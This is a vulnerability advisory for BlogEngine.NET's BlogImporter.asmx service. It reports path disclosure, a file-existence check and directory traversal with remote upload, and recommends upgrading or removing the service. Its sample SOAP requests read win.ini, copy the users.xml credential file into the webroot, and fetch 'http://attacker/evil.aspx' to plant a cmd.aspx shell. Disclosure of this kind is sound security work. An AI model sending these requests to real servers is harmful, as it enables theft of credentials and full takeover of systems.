Product: BlogEngine.NET Vendor informed: 24 Sep 2010 Fixed Version Released: 01 Jan 2011 Affected Versions: 1.6.x and prior versions Severtiy: Critical Impact: Information Discloure and System Compromise
BlogEngine.NET is an open source .NET blogging project that was born out of desire for a better blog platform. A blog platform with less complexity, easy customization, and one that takes advantage of the latest .NET features. We discovered several security problems in /api/BlogImporter.asmx web service which comes with default BlogEngine.NET installation.
1- Path Disclose - Several functions of blogimporter.asmx such as AddComment or AddPost may reveal local path information of applications stored. A remote user can use this info to determine the full path of the web root directory.
2- Unauthorized Access - "Source" parameter of GETFILE function may allow to access the files outside of the webroot directory. Attackers can use this problem to identify whether file is exist or not, or finding locations of system/configuration files such as win.ini, web.config etc. If the file exists in the requested path, application returns "true", if not exists application returns "false" messages in the http response. Sample portion of SOAP request which is causing the problem is as below.
<GetFile xmlns="http://dotnetblogengine.net/"> <source>c:\Windows\win.ini</source> <destination>string</destination> </GetFile>
3- Directory Traversal and File Upload – "destination" parameter of GETFILE function prone to directory traversal attack with /../../ sequence. Using this problem it is possible to upload files from remote sites to outsite of the App_Data/files directory which is normally cannot be accessible by web users, open important local configuration files (such as web.config, or App_Data/users.xml), seeing source code of applications, execute os commands via uploaded applications. This problem may allow an unauthorized users to fully compromise the target system.
<GetFile xmlns="http://dotnetblogengine.net/"> <source>c:\webroot\blog\App_Data\users.xml</source> <destination>../../aa.txt</destination> </GetFile> <GetFile xmlns="http://dotnetblogengine.net/"> <source>http://attacker/evil.aspx</source> <destination>/../../cmd.aspx</destination> </GetFile>
Upgrade to BlogEngine.Net 2.0 or remove /api/BlogImpoter.asmx.
Deniz CEVIK Best Regards